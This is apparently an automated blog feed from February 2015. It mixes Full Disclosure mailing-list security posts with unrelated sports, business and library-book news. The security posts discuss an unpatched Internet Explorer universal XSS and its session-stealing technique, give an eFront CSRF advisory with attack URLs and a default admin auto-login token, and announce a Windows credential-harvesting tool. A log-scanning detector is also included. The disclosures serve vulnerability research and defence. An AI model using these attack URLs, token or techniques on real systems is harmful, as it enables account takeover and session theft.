
Saturday, February 7, 2015

Re: [FD] Major Internet Explorer Vulnerability - NOT Patched

Hi David.

When I tried to reproduce it using code hosted on one of my domains, I tried three variations of what I assumed at the time the PHP code from the original was:

I wasn't able to get it working, so as I said, I used Burp Suite to modify your demo in realtime as it came down to my browser, with the Daily Mail domain being replaced in response headers and bodies with a different target domain, but no other changes made. It worked with another CloudFlare customer's site (tickld.com), but not a non-CloudFlare customer's site (can't share that one without giving away information I'm not supposed to). It seems like that was a coincidence, and that the reason it didn't work on the other site was something other than them not being a CloudFlare customer.

Enough other people (in particular, @filedescriptor, who Justin Steven sent a link to (http://ift.tt/1KsbrVG)) have validated the way the exploit works that I agree it appears to be essentially universal.

When are you going to give it a cool name and logo to ensure it gets the media coverage it deserves? :)

- Ben

On 2015-02-04 21:06, David Leo wrote:
> "is this entirely an IE flaw"
> Yes.
>
> "is it tied to the use of Cloudflare"
> No.
>
> "I tried to reproduce... was unsuccessful"
> Likely, this detail is missing:
>
> Please tell us whether you reproduce (with the PHP code).
>
> "am I correct... JavaScript hosted on shared domains"
> In the demo, it's first injected into page without any JavaScript.
> (robots.txt)
>
> "I don't have time to do a teardown on CloudFlare.JS"
> Honestly we don't even know such file exists :-)
> We uploaded and took a screenshot - that's all.
>
> "it's a very impressive exploit"
> Thanks.
>
> 'make sure the label "universal" is actually justified'
> It has also been tested against Yahoo etc.
>
> "Sorry if this has already been discussed elsewhere"
> Many asked - for example:
> http://ift.tt/1zv21Xy
>
> Again, please tell us whether you reproduce with the PHP code.
>
> Kind Regards,
>
> On 2015/2/5 3:29, Ben Lincoln (F7EFC8C9 - FD) wrote:
>> So here's a possibly stupid question: is this entirely an IE flaw, or
>> is it tied to the use of Cloudflare by the targeted site as well as
>> the attacking site?
>>
>> I ask because:
>>
>> 1 - I tried to reproduce the attack in a number of ways without using
>> CloudFlare, and was unsuccessful.
>> 2 - Since I don't have access to a CloudFlare account, I used Burp to
>> do a find/replace for proxied response headers and bodies on
>> "www.dailymail.co.uk" and then "dailymail.co.uk" with a target domain
>> which does not use Cloudflare, then accessed the Deusen demo page.
>> The injection attempt failed.
>> 3 - I then used Burp in the same way, but replaced
>> "www.dailymail.co.uk"/"dailymail.co.uk" with a target domain which
>> *does* use CloudFlare, and the injection attempt succeeded.
>>
>> If this is true, am I correct in thinking that while this definitely
>> involves a vulnerability in IE, it also depends at least on targeting
>> website owners who use JavaScript hosted on shared domains
>> (CloudFlare, in this case), which is inherently riskier than hosting
>> it all on one's own domain due to the way cross-domain security works
>> in modern browsers?
>>
>> I don't have time to do a teardown on CloudFlare.JS, but does this
>> also depend on some sort of code vulnerability in that file?
>>
>> Even if one or both of those caveats are true, it's a very impressive
>> exploit, but I'd like to make sure the label "universal" is actually
>> justified.
>>
>> Sorry if this has already been discussed elsewhere. I couldn't find
>> anything when I looked.
>>
>> - Ben
>>
>> On 2015-02-02 12:53, Joey Fowler wrote:
>>> Hi David,
>>>
>>> "nice" is an understatement here.
>>>
>>> I've done some testing with this one and, while there *are* quirks,
>>> it most definitely works. It even bypasses standard HTTP-to-HTTPS
>>> restrictions.
>>>
>>> As long as the page(s) being framed don't contain X-Frame-Options
>>> headers (with `deny` or `same-origin` values), it executes
>>> successfully. Pending the payload being injected, most Content
>>> Security Policies are also bypassed (by injecting HTML instead of
>>> JavaScript, that is).
>>>
>>> It looks like, through this method, all viable XSS tactics are open!
>>>
>>> Nice find!
>>>
>>> Has this been reported to Microsoft outside (or within) this thread?



Source: Gmail -> IFTTT-> Blogger

Re: [FD] Major Internet Explorer Vulnerability - NOT Patched

> is this entirely an IE flaw, or is it tied to the use of Cloudflare by the targeted site as well as the attacking site?

No, this is entirely an IE flaw. I've repro'd on domains that I know don't use cloudflare, from a domain that doesn't use cloudflare.

There's a great teardown on this POC by @filedescriptor at http://ift.tt/1KsbrVG



Source: Gmail -> IFTTT-> Blogger

Re: [FD] Major Internet Explorer Vulnerability - NOT Patched

Thanks Zaakiy,

I'm able to get the hacked page on IE9 after changing the document mode from Quirks to IE9 Standards. Screenshot attached. I'm sure you could get around having to manually switch the document mode with the appropriate DOCTYPE set in the exploit html page.

David, could you share the contents of "1.php"? I'm assuming it is a delayed re-direct to the target's domain? I am unable to reproduce the exploit locally with the same code (assuming my 1.php is correct), though without the cloudflare scripts.

Thanks,
Peter

Peter Barkley | Senior Security Intelligence Analyst | Security Operations Centre | Royal Bank of Canada



Source: Gmail -> IFTTT-> Blogger

[FD] Multiple CSRF vulnerabilities in eFront v. 3.6.15.2 (CE)

Advisory: Multiple CSRF vulnerabilities in eFront v. 3.6.15.2 (CE)
Advisory ID: SROEADV-2015-09
Author: Steffen Rösemann
Affected Software: eFront v. 3.6.15.2 (CE) (Release-date: 05-Dec-2014, build 18021)
Vendor URL: http://ift.tt/XKxSOF
Vendor Status: patched
CVE-ID: -
Tested with/on:
-Browser: Firefox 35, Iceweasel 31.3.0
-OS: Mac OS X 10.10 (XAMPP installation), Kali Linux 1.0.9a (Apache2, MySQL)

==========================
Vulnerability Description:
==========================

The E-learning platform eFront v. 3.6.15.2 (Community Edition, build 18021) suffers from multiple CSRF vulnerabilities.

==================
Technical Details:
==================

The vulnerabilities can be found in different modules that are all used in the administrator.php file:

ctg=modules (delete and deactivate/activate modules):

http:// {TARGET}/www/administrator.php?ctg=modules&delete_module={MODULE_NAME}&ajax=ajax
http:// {TARGET}/www/administrator.php?ctg=modules&deactivate_module={MODULE_NAME}&ajax=ajax
http:// {TARGET}/www/administrator.php?ctg=modules&activate_module={MODULE_NAME}&ajax=ajax

ctg=users (delete and deactivate/activate users):

http:// {TARGET}/www/administrator.php?ctg=users&activate_user={USER_NAME}&ajax=ajax
http:// {TARGET}/www/administrator.php?ctg=users&deactivate_user={USER_NAME}&ajax=ajax
http:// {TARGET}/www/administrator.php?ctg=users&delete_user={USER_NAME}&ajax=ajax

ctg=themes (activate/deactivate and delete themes):

http:// {TARGET}/www/administrator.php?ctg=themes&tab=set_theme&set_theme={THEME_ID}&ajax=ajax
http:// {TARGET}/www/administrator.php?ctg=themes&tab=set_theme&delete={THEME_ID}&ajax=ajax

ctg=digest (deactivate/activate and delete events, e.g. deactivate user registration, deactivate email for account activation)

e.g. EVENT_ID 3 = user email activation
e.g. EVENT_ID 4 = user registration

http:// {TARGET}/www/administrator.php?ctg=digests&postAjaxRequest=1&deactivate_notification={EVENT_ID}&event=1&ajax=ajax
http:// {TARGET}/www/administrator.php?ctg=digests&postAjaxRequest=1&activate_notification={EVENT_ID}&event=1&ajax=ajax
http:// {TARGET}/www/administrator.php?ctg=digests&delete_notification={EVENT_ID}&ajax=1&event=1

ctg=languages (deactivate/activate and delete language settings)

e.g. LANGUAGE_NAME = german

http:// {TARGET}/www/administrator.php?ctg=languages&activate_language={LANGUAGE_NAME}&ajax=ajax
http:// {TARGET}/www/administrator.php?ctg=languages&deactivate_language={LANGUAGE_NAME}&ajax=ajax
http:// {TARGET}/www/administrator.php?ctg=languages&delete_language={LANGUAGE_NAME}&ajax=ajax

Exploit-Example (valid for all above listed vulnerabilities):

The following CSRF-vulnerability can be abused to activate/deactivate the auto-login feature of an arbitrary user:

http://{TARGET}/www/administrator.php?ctg=maintenance&postAjaxRequest=1&autologin=1&login={USERNAME}&ajax=ajax

That makes it possible to login via a URL in an arbitrary user-account like in the following example without providing any login-credentials:

http://{TARGET}/www/index.php?autologin={AUTO_LOGIN_TOKEN}

eFront creates three standard user-accounts while the installation process. One of it is the administrators account. The components being used for creating the auto-login token are the following informations:

- a salt
- the accounts creation date
- the username

The salt isn't generated dynamically during the installation. On a common eFront installation without any changes by the administrator, it has the value cDWQR#$Rcxsc. The admin accounts creation date has the standard value 1365149958. As the standard administrators accountname is "admin", the auto-login token for the administrators account of eFront has always the value eb514ea3c45d74a1218e207fb4b345b1 if the precondition is fulfilled, that none of the above mentioned values were changed after the installation.

That makes it possible for an attacker to abuse the CSRF-vulnerability to gain access to the administrators account.

=========
Solution:
=========

Upgrade to eFront v. 3.6.15.3, build 18022.

====================
Disclosure Timeline:
====================

14/15-Jan-2015 – found the vulnerability
15-Jan-2015 - informed the developers (see [3])
15-Jan-2015 – release date of this security advisory [without technical details]
15-Jan-2015 - vendor responded, announces a patch
05-Feb-2015 - vendor released patch (v. 3.6.15.3, build 18022)
05-Feb-2015 - release date of this security advisory
05-Feb-2015 - send to FullDisclosure

========
Credits:
========

Vulnerability found and advisory written by Steffen Rösemann.

===========
References:
===========

[1] http://ift.tt/XKxSOF
[2] http://ift.tt/1A3Y90l
[3] http://ift.tt/1A3Y6Sj
[4] http://ift.tt/1zK4BYE



Source: Gmail -> IFTTT-> Blogger
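The requests listed in the eFront advisory above are plain GETs, so they leave a recognisable trace in web server access logs. The following Python is an added example, not part of the advisory or of eFront: it scans log lines for administrator.php state changes that did not originate from the site's own pages and for auto-login URLs. It assumes Apache "combined" log format and a site host of lms.example.test; the sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Query parameters that trigger a state change in the advisory's URL list.
STATE_PARAMS = {
    "delete_module", "deactivate_module", "activate_module",
    "activate_user", "deactivate_user", "delete_user",
    "set_theme", "delete",
    "deactivate_notification", "activate_notification", "delete_notification",
    "activate_language", "deactivate_language", "delete_language",
    "autologin",
}
# Admin auto-login token the advisory gives for an unchanged installation.
DEFAULT_ADMIN_TOKEN = "eb514ea3c45d74a1218e207fb4b345b1"

# Apache "combined" log format (an assumption of this example).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)


def referer_class(referer, site_host):
    """Classify the Referer header relative to the eFront site's own host."""
    if referer in ("", "-"):
        return "no-referer"
    host = (urlsplit(referer).hostname or "").lower()
    return "same-site" if host == site_host.lower() else "cross-site"


def scan(lines, site_host):
    """Return (client_ip, finding, parameter) tuples for suspicious requests."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line
        url = urlsplit(m["url"])
        params = parse_qs(url.query, keep_blank_values=True)
        origin = referer_class(m["referer"], site_host)
        if url.path.endswith("/www/administrator.php"):
            hit = sorted(STATE_PARAMS & params.keys())
            # A state change whose request did not come from the admin UI
            # itself is what a forged cross-site request looks like.
            if m["method"] == "GET" and hit and origin != "same-site":
                findings.append((m["ip"], "admin-action-" + origin, hit[0]))
        elif url.path.endswith("/www/index.php") and "autologin" in params:
            token = params["autologin"][0]
            kind = ("default-admin-token" if token == DEFAULT_ADMIN_TOKEN
                    else "autologin-login")
            findings.append((m["ip"], kind, "autologin"))
    return findings


# Constructed sample log lines; hosts and addresses are placeholders.
SAMPLE_LOG = [
    '203.0.113.7 - - [05/Feb/2015:10:01:02 +0000] "GET /www/administrator.php'
    '?ctg=users&deactivate_user=student1&ajax=ajax HTTP/1.1" 200 12 '
    '"http://lms.example.test/www/administrator.php?ctg=users" "Mozilla/5.0"',
    '203.0.113.7 - - [05/Feb/2015:10:03:40 +0000] "GET /www/administrator.php'
    '?ctg=maintenance&postAjaxRequest=1&autologin=1&login=admin&ajax=ajax '
    'HTTP/1.1" 200 12 "http://forum.example.net/thread/42" "Mozilla/5.0"',
    '198.51.100.9 - - [05/Feb/2015:10:04:11 +0000] "GET /www/index.php'
    '?autologin=eb514ea3c45d74a1218e207fb4b345b1 HTTP/1.1" 302 0 '
    '"-" "Mozilla/5.0"',
    '203.0.113.7 - - [05/Feb/2015:10:05:00 +0000] "GET /www/administrator.php'
    '?ctg=modules HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [05/Feb/2015:10:06:30 +0000] "GET /www/administrator.php'
    '?ctg=languages&delete_language=german&ajax=ajax HTTP/1.1" 200 5 '
    '"-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG, "lms.example.test"):
        print(finding)
```

A missing Referer is reported separately because browsers can be made to omit it, so it is a weaker signal than a cross-site one. The fix itself remains the upgrade named in the advisory's Solution section.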

[FD] Responder Windows Version

Responder for Windows is meant to propagate further compromises from a Windows workstation/server.

Features include:
- Be able to propagate (pivoting) compromises across subnets and domains from any compromised Windows machine ranging from Windows 2000 to 8.1, Server 2012R2.
- This tool can also be used to compromise a domain from an external penetration test.
- This version will disable NetBIOS on all interfaces and the current firewall profile (no reboot needed) on the target host.
- Default values will be turned back On when killing Responder (CTRL-C).
- LLMNR and Netbios work out of the box on any Windows XP-2003
- Netbios support works on all versions.
- Best way to collect hashes with this Windows version: Responder.exe -i IP_Addr -rF

Installing:
- Binary: Just drop the executable and the configuration file (Responder.conf) inside a directory (eg: c:/temp/responder) and launch it.
- From source:
  Install python on a Windows machine.
  run "pip install pyinstaller"
  cd in Responder source directory
  pyinstaller --onefile -F Responder.py
  Your binary will be located in the folder dist/
- Executing the source directly: You can run Responder as usual from the source folder (with python installed): python Responder.py

Considerations:
- Make sure you have administrative privileges.
- Make sure to include a conventional Responder.conf file in Responder running directory.
- Any rogue server can be turned off in Responder.conf.
- The Wpad proxy server is known to be buggy on some Windows versions. It's not recommended to use it.
- For now, SMB rogue authentication server is *not* supported.

You can download Responder for Windows (Beta) sources and binaries at the following url: http://ift.tt/1A3Y8JK

Follow latest updates on twitter: http://ift.tt/1kMSke2

Cheers,



Source: Gmail -> IFTTT-> Blogger

[FD] LG On Screen Phone authentication bypass (CVE-2014-8757)

LG On Screen Phone authentication bypass vulnerability



Source: Gmail -> IFTTT-> Blogger

Re: [FD] Major Internet Explorer Vulnerability - NOT Patched

'could you share the contents of "1.php"?'
Sure:

"I'm assuming it is a delayed re-direct to the target's domain?"
Exactly. :-)

"the cloudflare scripts"
It's been tested without them.

Kind Regards,

On 2015/2/6 2:31, Barkley, Peter wrote:
> Thanks Zaakiy,
>
> I'm able to get the hacked page on IE9 after changing the document mode from Quirks to IE9 Standards. Screenshot attached. I'm sure you could get around having to manually switch the document mode with the appropriate DOCTYPE set in the exploit html page.
>
> David, could you share the contents of "1.php"? I'm assuming it is a delayed re-direct to the target's domain? I am unable to reproduce the exploit locally with the same code (assuming my 1.php is correct), though without the cloudflare scripts.
>
> Thanks,
> Peter
>
> Peter Barkley | Senior Security Intelligence Analyst | Security Operations Centre | Royal Bank of Canada



Source: Gmail -> IFTTT-> Blogger

[FD] Very Important Info About "Major Internet Explorer Vulnerability - NOT Patched"

1. "Spartan - vulnerable (Windows 10)"
http://ift.tt/16y8ky1
Thanks to Zaakiy Siddiqui!

2. Many asked for it.

3. It's Universal XSS, as we tested:
Not only dailymail.co.uk - also Yahoo etc
Not only injecting content - also getting private info etc.

Kind Regards,



Source: Gmail -> IFTTT-> Blogger

Re: [FD] Major Internet Explorer Vulnerability - NOT Patched

"is this entirely an IE flaw"
Yes.

"is it tied to the use of Cloudflare"
No.

"I tried to reproduce... was unsuccessful"
Likely, this detail is missing:

Please tell us whether you reproduce (with the PHP code).

"am I correct... JavaScript hosted on shared domains"
In the demo, it's first injected into page without any JavaScript.
(robots.txt)

"I don't have time to do a teardown on CloudFlare.JS"
Honestly we don't even know such file exists :-)
We uploaded and took a screenshot - that's all.

"it's a very impressive exploit"
Thanks.

'make sure the label "universal" is actually justified'
It has also been tested against Yahoo etc.

"Sorry if this has already been discussed elsewhere"
Many asked - for example:
http://ift.tt/1zv21Xy

Again, please tell us whether you reproduce with the PHP code.

Kind Regards,

On 2015/2/5 3:29, Ben Lincoln (F7EFC8C9 - FD) wrote:
> So here's a possibly stupid question: is this entirely an IE flaw, or is it tied to the use of Cloudflare by the targeted site as well as the attacking site?
>
> I ask because:
>
> 1 - I tried to reproduce the attack in a number of ways without using CloudFlare, and was unsuccessful.
> 2 - Since I don't have access to a CloudFlare account, I used Burp to do a find/replace for proxied response headers and bodies on "www.dailymail.co.uk" and then "dailymail.co.uk" with a target domain which does not use Cloudflare, then accessed the Deusen demo page. The injection attempt failed.
> 3 - I then used Burp in the same way, but replaced "www.dailymail.co.uk"/"dailymail.co.uk" with a target domain which *does* use CloudFlare, and the injection attempt succeeded.
>
> If this is true, am I correct in thinking that while this definitely involves a vulnerability in IE, it also depends at least on targeting website owners who use JavaScript hosted on shared domains (CloudFlare, in this case), which is inherently riskier than hosting it all on one's own domain due to the way cross-domain security works in modern browsers?
>
> I don't have time to do a teardown on CloudFlare.JS, but does this also depend on some sort of code vulnerability in that file?
>
> Even if one or both of those caveats are true, it's a very impressive exploit, but I'd like to make sure the label "universal" is actually justified.
>
> Sorry if this has already been discussed elsewhere. I couldn't find anything when I looked.
>
> - Ben
>
> On 2015-02-02 12:53, Joey Fowler wrote:
>> Hi David,
>>
>> "nice" is an understatement here.
>>
>> I've done some testing with this one and, while there *are* quirks, it most
>> definitely works. It even bypasses standard HTTP-to-HTTPS restrictions.
>>
>> As long as the page(s) being framed don't contain X-Frame-Options headers
>> (with `deny` or `same-origin` values), it executes successfully. Pending
>> the payload being injected, most Content Security Policies are also
>> bypassed (by injecting HTML instead of JavaScript, that is).
>>
>> It looks like, through this method, all viable XSS tactics are open!
>>
>> Nice find!
>>
>> Has this been reported to Microsoft outside (or within) this thread?



Source: Gmail -> IFTTT-> Blogger

Re: [FD] Major Internet Explorer Vulnerability - NOT Patched

Ben, we have reproduced the vulnerability on many occasions.

First of all, at least to steal the session it does not matter if X-Frame-Option is set to deny/same-origin.

Secondly, we were able to easily bypass the alert popup. It is not needed if you implement the "waiting" logic with a synchronous AJAX call or a looped wait (there is no sleep in JS).

The most important part is that the "1.php" in the original POC should implement a sleep itself. This seems to do the trick to allow setTimeout to be assigned in the iframe prior to being redirected to the target site. It has nothing to do with Cloudflare.

Nevertheless, it is particularly difficult in my opinion to serve one HTML page to target multiple web sites at once in a phishing/session-stealing attack. This is because alert/synchronous AJAX/custom sleep lock the browser resources so other iframe-based (independent) attacks cannot be executed. Using asynchronous AJAX with onreadystate does not seem to work.

But, of course, the alert dialog can still be easily bypassed so web users can't do anything to avoid a single exploitation.

Regards,
Dimitris Strevinas
Chief Security Engineer / Obrela Security Industries



Source: Gmail -> IFTTT-> Blogger

MLS Update February 07, 2015 at 03:34PM

Seattle Sounders midfielder Osvaldo Alonso undergoes successful right groin surgery, will begin rehab immediately


The Seattle Sounders announced Saturday that midfielder Osvaldo Alonso has undergone successful right groin surgery. The procedure was performed by Dr. William Hutchinson Jr. on Friday, February 6 in Santa Monica, California. Alonso is set to begin rehabilitation immediately following the procedure.






from MLSsoccer.com News http://ift.tt/16EZX4a

via IFTTT


MLS Update February 07, 2015 at 02:01PM

USMNT has "a lot of respect" for Panama side on the rise, expect "tough" game at StubHub Center


CARSON, Calif. – Panama's rise among CONCACAF's elite nations, which nearly climaxed with a berth in last year's World Cup, hasn't gone unnoticed, certainly not by the US men's national team.





from MLSsoccer.com News http://ift.tt/1IrbVQb

via IFTTT

United States defender Steve Birnbaum (knee) won't play against Panama on Sunday after starting last week against Chile (ESPN)

from ESPN http://m.espn.go.com/

via IFTTT

NBC's bid for the truth led by veteran 'digger'

NBC's investigation into Brian Williams is headed by Richard Esposito, a senior executive producer.



from Business and financial news - CNNMoney.com http://ift.tt/1D8FDV9

via IFTTT

Book Release: Animals in Translation Using the Mysteries of Autism to Decode Animal Behavior by Grandin, Temple; Johnson, Catherine.

Temple Grandin's -- Animals in Translation Among its provocative ideas, the book: argues that language is not a requirement for consciousness -- and that animals do have consciousness applies the autism theory of "hyper-specificity" to animals, showing that animals and autistic people are so sensitive to detail that they "can't see the forest for the trees" -- a talent as well as a "deficit" explores the "interpreter" in the normal human brain that filters out detail, leaving people bli



Source: Baltimore County Public Library - New Books

via IFTTT

Brian Williams stepping aside for 'several days'

Read full story for latest details.



from Business and financial news - CNNMoney.com http://ift.tt/1AGLh1t

via IFTTT

MLS Update February 07, 2015 at 11:00AM

Joey Saputo and the Montreal Impact are unmoved by big spending of rival Toronto FC: "We have a plan"


MONTREAL – For a second straight winter, Toronto FC made the biggest splash – expansion teams aside – in this year's MLS transfer market.


So when Impact owner Joey Saputo was asked for his general thoughts on the offseason at a roundtable discussion this Wednesday, he couldn’t escape the state of affairs at Montreal’s historical rival.





from MLSsoccer.com News http://ift.tt/1KBh7fS

via IFTTT

MLS Update February 07, 2015 at 11:43AM

Jurgen Klinsmann still favors Michael Bradley in advanced position for USMNT despite holding role vs. Chile


CARSON, Calif. – Michael Bradley was back in his familiar holding-midfield role for the US men's national team's friendly last week in Chile. Did it signal that Jurgen Klinsmann has changed his mind on how best to employ the Toronto FC star?


Uh, no.


Klinsmann played Bradley as an attacking midfielder last year, including all four World Cup games in Brazil, but he positioned the 27-year-old veteran deeper against Chile, he said, based on the makeup of his roster.





from MLSsoccer.com News http://ift.tt/1yUvp5Q

via IFTTT

US defender Birnbaum injured, will skip Panama friendly

CARSON, Calif. (AP) United States defender Steve Birnbaum has a minor knee injury that will keep him out of Sunday's game against Panama.



from FOX Sports Digital http://ift.tt/1LZMZ1k

via IFTTT

MLS Update February 07, 2015 at 10:52AM

DC United defender Steve Birnbaum out of USMNT friendly vs. Panama with minor knee injury


CARSON, Calif. – D.C. United center back Steve Birnbaum has been “dealing with a minor knee injury for the past couple of days” and won't be available for Sunday's US men's national team friendly against Panama, US Soccer revealed on the eve of the match.


Birnbaum, an MLS Rookie of the Year finalist who made his international debut in last week's loss in Chile, was expected to play a major role on the US backline.





from MLSsoccer.com News http://ift.tt/1zj940O

via IFTTT

People hate the new Keurig ... and its stock

Read full story for latest details.



from Business and financial news - CNNMoney.com http://ift.tt/1Cy4HpT

via IFTTT

Brian Williams' reporting on Katrina: What we know

It didn't take long for the scandal enveloping Brian Williams to prompt fresh scrutiny of one of the most formative reporting assignments of his career: His time in New Orleans after Hurricane Katrina.



from Business and financial news - CNNMoney.com http://ift.tt/16TJKsq

via IFTTT

Sydney FC beats Perth 3-1 in A-League

SYDNEY (AP) Perth's lead in the A-League was cut to one point after its 10-man side lost to nine-man Sydney FC 3-1, while second-place Melbourne Victory beat Melbourne City 3-0.



from FOX Sports Digital http://ift.tt/1DqInhe

via IFTTT

Torino wins 3-1 at Verona in Serie A

MILAN (AP) Torino beat Hellas Verona 3-1 Saturday for its fourth successive victory in Serie A.



from FOX Sports Digital http://ift.tt/1AGgxhd

via IFTTT

Congo beats Eq. Guinea on penalties in 3rd place game

MALABO, Equatorial Guinea (AP) Congo beat host Equatorial Guinea 4-2 in a penalty shootout on Saturday after the third place game at the African Cup of Nations ended 0-0 after 90 minutes.



from FOX Sports Digital http://ift.tt/1C6UwWu

via IFTTT

MLS Update February 07, 2015 at 08:19AM

American Exports: John Brooks plays critical role in return to the lineup as Hertha Berlin grab needed win


AMSTERDAM – Hertha Berlin defender John Anthony Brooks returned to the lineup with a vengeance to help the visitors vault out of the Bundesliga danger zone with a 2-0 victory at Mainz 05.





from MLSsoccer.com News http://ift.tt/1A1Runm

via IFTTT

Book Release: The Short Stories of Ernest Hemingway by Hemingway, Ernest.

Before he gained wide fame as a novelist, Ernest Hemingway established his literary reputation with his short stories. This collection, The Short Stories, originally published in 1938, is definitive. Among these forty-nine short stories are Hemingway's earliest efforts, written when he was a young foreign correspondent in Paris, and such masterpieces as "Hills Like White Elephants," "The Killers," "The Short, Happy Life of Francis Macomber," and "The Snows of Kilimanjaro." Set in the varied land



Source: Baltimore County Public Library - New Books

via IFTTT

MLS Update February 07, 2015 at 07:43AM

MLS Preseason Tracker: Matches, highlights, scores & news updates as they happen (February 7)


Preseason is officially underway, and we've got five games on the schedule today.





from MLSsoccer.com News http://ift.tt/1DqkZAm

via IFTTT

Crystal Palace beats Leicester 1-0 in Premier League

LEICESTER, England (AP) Joseph Ledley's second-half goal was enough to give Crystal Palace a 1-0 win over last-place Leicester in the Premier League on Saturday.



from FOX Sports Digital http://ift.tt/1uobFep

via IFTTT

Chelsea extends lead atop Premier League to 7 points

LONDON (AP) Chelsea extended its Premier League lead to seven points by beating Aston Villa 2-1 on Saturday while Manchester City was held to a 1-1 draw by Hull.



from FOX Sports Digital http://ift.tt/1uobEXT

via IFTTT

Southampton beats QPR 1-0 in Premier League

LONDON (AP) Sadio Mane scored in injury time to give Southampton a 1-0 win over struggling Queens Park Rangers and keep the club in the top four of the Premier League.



from FOX Sports Digital http://ift.tt/1uobC2a

via IFTTT

La Liga: Atletico Madrid hammer Real Madrid 4-0 to cut Real's lead atop the table to four points (ESPN)

from ESPN http://m.espn.go.com/

via IFTTT

Prem: Chelsea open seven-point lead on Manchester City after winning at Aston Villa 2-1, while City draw 1-1 with Hull (ESPN)

from ESPN http://m.espn.go.com/

via IFTTT

Anthem Data Breach — 6 Things You Need To Know

The nation's second-largest health insurer, Anthem, alerted its customers on Wednesday that hackers had stolen the personal information of over 80 million of its customers, making it the largest data breach and double the number of payment cards affected by the Target data breach that occurred in 2013. The stolen personal information includes residential addresses, birthdays, medical





from The Hacker News http://ift.tt/1IpcHNn

via IFTTT

MLS Update February 07, 2015 at 06:43AM

American Exports: Ventura Alvarado keeps his place for Club America as he starts in draw at Morelia


GUADALAJARA, Mexico – Only time will tell, but Friday could’ve been a turning point in the career of Ventura Alvarado, who started ahead of Paraguay international Pablo Aguilar at center back for Club America in their 2-2 draw on the road to Morelia on Friday night.



The 22-year-old Phoenix, Ariz. native had replaced the suspended Aguilar last Saturday in Las Aguilas’ 1-0 win over Tigres and retained his place this weekend.






from MLSsoccer.com News http://ift.tt/16vhETa

via IFTTT


Argentina has a new star with a familiar name: Simeone

MONTEVIDEO, Uruguay (AP) Argentina has a new star in the making, and the name will be familiar to many.



from FOX Sports Digital http://ift.tt/1Dq9dGe

via IFTTT

Friday, February 6, 2015

Book Release: Beautiful redemption by McGuire, Jamie, author.

FBI Special Agent in Charge Thomas Maddox and FBI agent Liis Lindy go undercover to spare Thomas' brother Travis Maddox from a prison term by recruiting him into the FBI, but Liis wonders if her feelings for Thomas are more than just a cover story.



Source: Baltimore County Public Library - New Books

via IFTTT

Book Release: Unstoppable love by Sterling, Porscha

Book Release: We belong together 2 by Moore, Michel'le

Book Release: We belong together by Moore, Michel'le

15 Questions with ... Saadia Muzaffar

Saadia Muzaffar is a leading force in Canada's tech scene and the first in CNNMoney's new series. She founded Tech Girls Canada and is passionate about increasing the ratio of women in tech.



from Business and financial news - CNNMoney.com http://ift.tt/1I9dyBJ

via IFTTT

Staples and RadioShack deliver big blow to jobs

Staples' proposal to buy Office Depot will probably mean even more job losses than RadioShack's bankruptcy and store closing announcement.



from Business and financial news - CNNMoney.com http://ift.tt/1FfmgJx

via IFTTT

Brokaw: I have not demanded Brian Williams be fired

Tom Brokaw refutes reports that he wants Brian Williams fired.



from Business and financial news - CNNMoney.com http://ift.tt/1Ffmgtb

via IFTTT

'Better Call Saul' better be a hit for AMC

Shares of AMC Networks have done little since the tale of Walter White ended. That's why expectations are high for "Breaking Bad" spin-off "Better Call Saul."



from Business and financial news - CNNMoney.com http://ift.tt/1LVtEhQ

via IFTTT

Book Release: Love hotel by Unrue, Jane.

Book Release: Toxic by Van Dyken, Rachel, author.

Gabe Hyde is on borrowed time. Keeping his identity a secret isn't all it's cracked up to be, especially when he meets Saylor. A girl who reminds him of one he used to love--a girl who has the power to break down every wall he's ever built.



Source: Baltimore County Public Library - New Books

via IFTTT

Gravity wins: GoPro stock plummets 10%

GoPro was an IPO stud last year and its Hero cameras are still selling like hotcakes, but investors are losing interest.



from Business and financial news - CNNMoney.com http://ift.tt/1D5XsEm

via IFTTT

Where zombie foreclosures are making a comeback

While the number of zombie foreclosures has fallen from last year, 19 states have seen a resurgence, a recent RealtyTrac report found.



from Business and financial news - CNNMoney.com http://ift.tt/1DIqdVE

via IFTTT

Book Release: All the wrong places : a life lost and found by Connors, Phillip.

Connors, who recalled his stints as a fire lookout in "Fire Season" here revisits the period before he entered the wilderness during a time of searching (mostly in vain) for answers to the riddle of his brother's suicide at the age of 22. His path takes him to New York, where he is a fish out of water, working at the "Wall Street Journal" despite his socialist leanings and living in the Bedford-Stuyvesant section of Brooklyn, where his white skin makes him an object of baffled wonder in an all-b



Source: Baltimore County Public Library - New Books

via IFTTT

Book Release: Bold : how to go big, achieve success, and impact the world by Diamandis, Peter H. author.

"Bold is a radical, how-to guide for using exponential technologies, moonshot thinking, and crowd-powered tools to create extraordinary wealth while also positively impacting the lives of billions."--Jacket flap.



Source: Baltimore County Public Library - New Books

via IFTTT

Book Release: Storm of dogs by Hunter, Erin.

"Lucky and the dogs of the Wild Pack must fight tooth and claw to survive the storm of dogs--the terrifying battle that has been haunting Lucky's dreams"--



Source: Baltimore County Public Library - New Books

via IFTTT

MLS Update February 06, 2015 at 07:50AM

Philadelphia Union academy kids invited to Florida preseason, could become next Homegrown signings



For the first time in franchise history, the Philadelphia Union have elected to bring members of their youth academy to Florida for preseason training – with the primary goal to show the youngsters what it’s like to be a professional for a few weeks.


But that’s not the only goal.





from MLSsoccer.com News http://ift.tt/1KoniWE


Next season's Serie A leaves time for Euro 2016 preparation

MILAN (AP) Next season's Serie A will begin Aug. 23 and end on May 15, 2016, meeting a request from Italy coach Antonio Conte to leave enough time to prepare for the European Championship.



from FOX Sports Digital http://ift.tt/1C1nKnp


In photos: Subaru WRX sibling rivalry

The WRX STI has always been on top of Subaru's pedestal, but its cheaper sibling is aiming to knock it off.



from Business and financial news - CNNMoney.com http://ift.tt/1v5pKrX


Apple CEO who fired Jobs: 'I wish I had hired him back'

John Sculley, Apple's former CEO who ousted Steve Jobs, said he wished he could have hired him back.



from Business and financial news - CNNMoney.com http://ift.tt/16Nw0j2


Morocco fined $1M for failing to host African Cup

